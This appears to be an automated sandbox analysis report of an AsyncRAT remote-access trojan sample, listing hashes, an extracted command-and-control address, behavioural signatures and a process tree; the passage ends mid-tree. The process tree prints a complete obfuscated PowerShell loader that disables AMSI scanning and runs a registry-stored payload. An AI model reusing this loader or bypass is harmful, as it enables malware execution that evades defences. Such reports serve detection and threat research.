asyncrat | 342fda83ad4d56696ec349715775d5b6f5b3bbb46e57918b9e7b458c75be2a87

Analysis

max time kernel
30s
max time network
4s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
13-07-2024 04:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batch.exe
Size

194KB
MD5

5cd0d1cc05f646037164ab9fceacf995
SHA1

1eab49d606689ac01f2423441a553ec829854a65
SHA256

342fda83ad4d56696ec349715775d5b6f5b3bbb46e57918b9e7b458c75be2a87
SHA512

4b755c993531a95cf51362607b78b0fee15ffe133a0951d1e9f18582d8092c99a7fbe30679d8b2279d5cecfeb09291e4e053dd7bacd884a644976193348ba37e
SSDEEP

3072:96Up6fIk/wZypP/9F/ix/A9wXnDLn1mFbTYGtdGt3WzZb29b/zSLpSoSE:96Wd6/9FO/AmL1mFbckdGtmzYR/zAc

Score

10^/10

asyncrat !dead code tool's rat

Malware Config

Extracted

Family

asyncrat

Version

1.0.7

Botnet

!DEAD CODE TOOL'S

chapter-designated.gl.at.ply.gg:27729

Mutex

!DEADCODEMutex_lm.deadcode

Attributes

delay
3
install
false
install_file
svchost.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 2460 created 3348	2460	WerFault.exe	88

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 2868 created 588	2868	powershell.EXE	5
PID 3508 created 3348	3508	svchost.exe	88

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/files/0x000900000002346e-15.dat	family_asyncrat

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation	batch.exe

Executes dropped EXE 2 IoCs

pid	Process
4048	DeadSecRootKit.exe
3348	DeadClient.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
13	ip-api.com

Drops file in System32 directory 8 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File created	C:\Windows\System32\DeadSecRootKit.exe	batch.exe
File opened for modification	C:\Windows\System32\DeadSecRootKit.exe	batch.exe
File created	C:\Windows\System32\DeadClient.exe	batch.exe
File opened for modification	C:\Windows\System32\DeadClient.exe	batch.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2868 set thread context of 4812	2868	powershell.EXE	91

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe

Modifies data under HKEY_USERS 41 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2868	powershell.EXE
2868	powershell.EXE
2868	powershell.EXE
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe
4184	wmiprvse.exe
4184	wmiprvse.exe
4184	wmiprvse.exe
4184	wmiprvse.exe
4812	dllhost.exe
4812	dllhost.exe
4184	wmiprvse.exe
4184	wmiprvse.exe
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe
3988	WerFault.exe
3988	WerFault.exe
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe
3508	svchost.exe
3508	svchost.exe
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe
4812	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3500	batch.exe
Token: SeDebugPrivilege	2868	powershell.EXE
Token: SeDebugPrivilege	2868	powershell.EXE
Token: SeDebugPrivilege	4812	dllhost.exe
Token: SeIncreaseQuotaPrivilege	3348	DeadClient.exe
Token: SeSecurityPrivilege	3348	DeadClient.exe
Token: SeTakeOwnershipPrivilege	3348	DeadClient.exe
Token: SeLoadDriverPrivilege	3348	DeadClient.exe
Token: SeSystemProfilePrivilege	3348	DeadClient.exe
Token: SeSystemtimePrivilege	3348	DeadClient.exe
Token: SeProfSingleProcessPrivilege	3348	DeadClient.exe
Token: SeIncBasePriorityPrivilege	3348	DeadClient.exe
Token: SeCreatePagefilePrivilege	3348	DeadClient.exe
Token: SeBackupPrivilege	3348	DeadClient.exe
Token: SeRestorePrivilege	3348	DeadClient.exe
Token: SeShutdownPrivilege	3348	DeadClient.exe
Token: SeDebugPrivilege	3348	DeadClient.exe
Token: SeSystemEnvironmentPrivilege	3348	DeadClient.exe
Token: SeRemoteShutdownPrivilege	3348	DeadClient.exe
Token: SeUndockPrivilege	3348	DeadClient.exe
Token: SeManageVolumePrivilege	3348	DeadClient.exe
Token: 33	3348	DeadClient.exe
Token: 34	3348	DeadClient.exe
Token: 35	3348	DeadClient.exe
Token: 36	3348	DeadClient.exe
Token: SeAssignPrimaryTokenPrivilege	2244	svchost.exe
Token: SeIncreaseQuotaPrivilege	2244	svchost.exe
Token: SeSecurityPrivilege	2244	svchost.exe
Token: SeTakeOwnershipPrivilege	2244	svchost.exe
Token: SeLoadDriverPrivilege	2244	svchost.exe
Token: SeSystemtimePrivilege	2244	svchost.exe
Token: SeBackupPrivilege	2244	svchost.exe
Token: SeRestorePrivilege	2244	svchost.exe
Token: SeShutdownPrivilege	2244	svchost.exe
Token: SeSystemEnvironmentPrivilege	2244	svchost.exe
Token: SeUndockPrivilege	2244	svchost.exe
Token: SeManageVolumePrivilege	2244	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2244	svchost.exe
Token: SeIncreaseQuotaPrivilege	2244	svchost.exe
Token: SeSecurityPrivilege	2244	svchost.exe
Token: SeTakeOwnershipPrivilege	2244	svchost.exe
Token: SeLoadDriverPrivilege	2244	svchost.exe
Token: SeSystemtimePrivilege	2244	svchost.exe
Token: SeBackupPrivilege	2244	svchost.exe
Token: SeRestorePrivilege	2244	svchost.exe
Token: SeShutdownPrivilege	2244	svchost.exe
Token: SeSystemEnvironmentPrivilege	2244	svchost.exe
Token: SeUndockPrivilege	2244	svchost.exe
Token: SeManageVolumePrivilege	2244	svchost.exe
Token: SeDebugPrivilege	4184	wmiprvse.exe
Token: SeAuditPrivilege	2120	svchost.exe
Token: SeAuditPrivilege	2532	svchost.exe
Token: SeAuditPrivilege	2532	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2244	svchost.exe
Token: SeIncreaseQuotaPrivilege	2244	svchost.exe
Token: SeSecurityPrivilege	2244	svchost.exe
Token: SeTakeOwnershipPrivilege	2244	svchost.exe
Token: SeLoadDriverPrivilege	2244	svchost.exe
Token: SeSystemtimePrivilege	2244	svchost.exe
Token: SeBackupPrivilege	2244	svchost.exe
Token: SeRestorePrivilege	2244	svchost.exe
Token: SeShutdownPrivilege	2244	svchost.exe
Token: SeSystemEnvironmentPrivilege	2244	svchost.exe
Token: SeUndockPrivilege	2244	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3500 wrote to memory of 4048	3500	batch.exe	87
PID 3500 wrote to memory of 4048	3500	batch.exe	87
PID 3500 wrote to memory of 4048	3500	batch.exe	87
PID 3500 wrote to memory of 3348	3500	batch.exe	88
PID 3500 wrote to memory of 3348	3500	batch.exe	88
PID 2868 wrote to memory of 4812	2868	powershell.EXE	91
PID 2868 wrote to memory of 4812	2868	powershell.EXE	91
PID 2868 wrote to memory of 4812	2868	powershell.EXE	91
PID 2868 wrote to memory of 4812	2868	powershell.EXE	91
PID 2868 wrote to memory of 4812	2868	powershell.EXE	91
PID 2868 wrote to memory of 4812	2868	powershell.EXE	91
PID 2868 wrote to memory of 4812	2868	powershell.EXE	91
PID 2868 wrote to memory of 4812	2868	powershell.EXE	91
PID 4812 wrote to memory of 588	4812	dllhost.exe	5
PID 4812 wrote to memory of 676	4812	dllhost.exe	7
PID 4812 wrote to memory of 964	4812	dllhost.exe	12
PID 4812 wrote to memory of 384	4812	dllhost.exe	13
PID 4812 wrote to memory of 408	4812	dllhost.exe	14
PID 4812 wrote to memory of 1004	4812	dllhost.exe	15
PID 4812 wrote to memory of 1056	4812	dllhost.exe	16
PID 4812 wrote to memory of 1068	4812	dllhost.exe	17
PID 4812 wrote to memory of 1144	4812	dllhost.exe	18
PID 4812 wrote to memory of 1152	4812	dllhost.exe	19
PID 4812 wrote to memory of 1256	4812	dllhost.exe	21
PID 4812 wrote to memory of 1264	4812	dllhost.exe	22
PID 4812 wrote to memory of 1356	4812	dllhost.exe	23
PID 4812 wrote to memory of 1440	4812	dllhost.exe	24
PID 4812 wrote to memory of 1452	4812	dllhost.exe	25
PID 4812 wrote to memory of 1508	4812	dllhost.exe	26
PID 4812 wrote to memory of 1520	4812	dllhost.exe	27
PID 4812 wrote to memory of 1640	4812	dllhost.exe	28
PID 4812 wrote to memory of 1656	4812	dllhost.exe	29
PID 4812 wrote to memory of 1732	4812	dllhost.exe	30
PID 4812 wrote to memory of 1796	4812	dllhost.exe	31
PID 4812 wrote to memory of 1808	4812	dllhost.exe	32
PID 4812 wrote to memory of 1920	4812	dllhost.exe	33
PID 4812 wrote to memory of 1928	4812	dllhost.exe	34
PID 4812 wrote to memory of 1980	4812	dllhost.exe	35
PID 4812 wrote to memory of 1988	4812	dllhost.exe	36
PID 4812 wrote to memory of 1584	4812	dllhost.exe	37
PID 4812 wrote to memory of 2120	4812	dllhost.exe	39
PID 4812 wrote to memory of 2244	4812	dllhost.exe	40
PID 4812 wrote to memory of 2320	4812	dllhost.exe	41
PID 4812 wrote to memory of 2328	4812	dllhost.exe	42
PID 4812 wrote to memory of 2444	4812	dllhost.exe	43
PID 4812 wrote to memory of 2532	4812	dllhost.exe	44
PID 4812 wrote to memory of 2552	4812	dllhost.exe	45
PID 4812 wrote to memory of 2572	4812	dllhost.exe	46
PID 4812 wrote to memory of 2588	4812	dllhost.exe	47
PID 4812 wrote to memory of 2596	4812	dllhost.exe	48
PID 4812 wrote to memory of 2916	4812	dllhost.exe	49
PID 4812 wrote to memory of 2492	4812	dllhost.exe	51
PID 4812 wrote to memory of 3092	4812	dllhost.exe	52
PID 4812 wrote to memory of 3156	4812	dllhost.exe	53
PID 4812 wrote to memory of 3212	4812	dllhost.exe	54
PID 4812 wrote to memory of 3356	4812	dllhost.exe	55
PID 4812 wrote to memory of 3428	4812	dllhost.exe	56
PID 4812 wrote to memory of 3536	4812	dllhost.exe	57
PID 4812 wrote to memory of 3732	4812	dllhost.exe	58
PID 4812 wrote to memory of 3888	4812	dllhost.exe	60
PID 4812 wrote to memory of 3152	4812	dllhost.exe	62
PID 4812 wrote to memory of 4604	4812	dllhost.exe	65
PID 4812 wrote to memory of 1744	4812	dllhost.exe	67
PID 4812 wrote to memory of 3708	4812	dllhost.exe	68

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:588
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:384
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{c4979ff8-3e05-4137-a7e6-02f25d0ed1ec}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4812

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:964

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:408

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1004

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1056

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1068

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1144

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1152
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:3156
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:fWoKYsbnDTak{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$PBcsBNyFYAxsgO,[Parameter(Position=1)][Type]$gOmPTdlerg)$XIsLcxblLxy=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+'f'+''+'l'+''+'e'+'c'+'t'+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+''+[Char](108)+''+'e'+'g'+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+'e'+'m'+'or'+[Char](121)+'M'+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType('My'+'D'+''+[Char](101)+''+'l'+''+[Char](101)+'g'+[Char](97)+'t'+[Char](101)+''+'T'+''+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+',P'+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+'e'+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+'l'+[Char](97)+''+'s'+''+[Char](115)+''+','+''+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$XIsLcxblLxy.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+'p'+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+'m'+'e,'+'H'+'id'+[Char](101)+'B'+[Char](121)+'S'+[Char](105)+''+'g'+''+','+'P'+'u'+'bl'+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$PBcsBNyFYAxsgO).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+''+'i'+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$XIsLcxblLxy.DefineMethod(''+'I'+''+'n'+''+[Char](118)+'o'+[Char](107)+'e','Pub'+[Char](108)+'i'+'c'+''+','+''+'H'+'id'+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+'wS'+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$gOmPTdlerg,$PBcsBNyFYAxsgO).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+'i'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+'an'+'a'+''+'g'+'e'+[Char](100)+'');Write-Output $XIsLcxblLxy.CreateType();}$IPhXzflwBkdWt=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+'s'+''+'t'+''+[Char](101)+''+[Char](109)+'.'+[Char](100)+'ll')}).GetType(''+[Char](77)+'i'+'c'+'r'+[Char](111)+'so'+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+''+'U'+''+[Char](110)+'saf'+'e'+'N'+[Char](97)+''+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+'M'+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+'d'+[Char](115)+'');$wTCVQFPzrBoAHO=$IPhXzflwBkdWt.GetMethod(''+'G'+'e'+[Char](116)+'Proc'+[Char](65)+'d'+'d'+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$qtSZnhiJpbKxKDPKnzz=fWoKYsbnDTak @([String])([IntPtr]);$QgNGqDBUJosBoPkIEaZBHy=fWoKYsbnDTak @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$UaDQZpbYBrc=$IPhXzflwBkdWt.GetMethod('G'+'e'+''+'t'+''+'M'+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+'eH'+[Char](97)+'nd'+[Char](108)+''+'e'+'').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+'n'+[Char](101)+''+[Char](108)+''+'3'+''+'2'+''+[Char](46)+'d'+[Char](108)+'l')));$hPkBSVsCMUtCLH=$wTCVQFPzrBoAHO.Invoke($Null,@([Object]$UaDQZpbYBrc,[Object](''+'L'+''+[Char](111)+'ad'+'L'+'ib'+[Char](114)+''+'a'+''+'r'+''+[Char](121)+'A')));$IvEqNQOzXiNEjjaPs=$wTCVQFPzrBoAHO.Invoke($Null,@([Object]$UaDQZpbYBrc,[Object](''+'V'+'irt'+[Char](117)+'a'+[Char](108)+''+'P'+''+'r'+''+[Char](111)+'tect')));$fbyZfvp=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hPkBSVsCMUtCLH,$qtSZnhiJpbKxKDPKnzz).Invoke('a'+[Char](109)+''+[Char](115)+''+[Char](105)+''+'.'+''+[Char](100)+'l'+[Char](108)+'');$EjfwWKAzqyQxIYRGp=$wTCVQFPzrBoAHO.Invoke($Null,@([Object]$fbyZfvp,[Object](''+'A'+'ms'+[Char](105)+''+'S'+''+[Char](99)+''+[Char](97)+''+'n'+'B'+[Char](117)+''+'f'+''+[Char](102)+'e'+'r'+'')));$QmmPrqWKwo=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IvEqNQOzXiNEjjaPs,$QgNGqDBUJosBoPkIEaZBHy).Invoke($EjfwWKAzqyQxIYRGp,[uint32]8,4,[ref]$QmmPrqWKwo);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$EjfwWKAzqyQxIYRGp,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IvEqNQOzXiNEjjaPs,$QgNGqDBUJosBoPkIEaZBHy).Invoke($EjfwWKAzqyQxIYRGp,[uint32]8,0x20,[ref]$QmmPrqWKwo);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+''+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue('D'+[Char](101)+''+[Char](97)+''+'d'+'s'+[Char](116)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2868

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1256

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1264

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1356

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1440
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2492

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1452

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1508

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1520

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1640

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1656

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1732

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1796

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1808

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1920

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1928

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1980

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1988

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1584

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2120

C:\Windows\system32\svchost.exe
